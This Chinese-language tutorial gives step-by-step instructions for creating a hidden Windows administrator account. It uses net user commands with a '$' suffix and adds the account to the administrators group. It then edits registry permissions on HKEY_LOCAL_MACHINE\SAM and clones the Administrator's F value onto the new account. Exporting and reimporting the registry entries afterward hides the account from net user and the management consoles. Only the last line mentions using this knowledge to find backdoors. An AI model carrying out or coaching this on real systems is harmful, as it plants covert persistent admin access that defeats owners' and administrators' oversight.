创建隐藏帐号之前,介绍几个命令。
net user //查看用户
net user 用户名 密码 /add //添加用户
net user 用户名 /del //删除用户
net localgroup //查看用户组
net localgroup 用户组 用户名 /add //添加用户到用户组
——-操作过程—–
“开始”- “运行”输入cmd 回车
添加一个隐藏的账号 (123$ 是账号 mima 是密码)
net user 123$ mima /add ($这个符号Shift+4)
把账号添加超级用户组(administrators 这个是超级管理员组,注意后边有个s)
查看一下是否隐藏了。
再去服务器管理器呢里查看下(“计算机”右键 “管理”打开服务器管理器)
这里可以看到帐号,说明这里还没有隐藏。
继续操作,“开始”“运行”输入regedit或者regedt32 回车
依次点开 HKEY_LOCAL_MACHINE\SAM\SAM
一般点到第二个SAM就点不动了
右键-权限,给超级用户组分配权限
按下F5刷新下
继续点开 Domains\Account\Users\Names
可以看到每个账号都对应上边的一个项
注:(dream是超级用户,大部分的都是administrator,它对应的项是1F4)
然后我们复制1F4里边F键值的内容 替换3EA里边F键值的内容
F键值右键-修改
分别导出 3EA和123$(右键导出-随便保存个名字)
导出后的文件
然后去cmd 删除 创建的账号
net user 123$ /del
然后分别打开我们导出来的二个注册表。
双击运行,点是。
cmd 查看一下用户名。
net user
没有看到我们的帐号,说明隐藏了。
再去服务器管理器呢里看下
也没显示,说明隐藏了。
账户管理呢里查看下,也没有。说明已经完全隐藏了。
最后一步,删除我们的导出的文件,然后把注册表全部收缩起来,到SAM呢点把adminsitrator账户的控制权在取消掉,这样一个隐藏帐号就设置完成了。
学会了如何添加隐藏账号,我们也可以反方向进入 注册表查找隐藏账号,避免自己的系统被留后门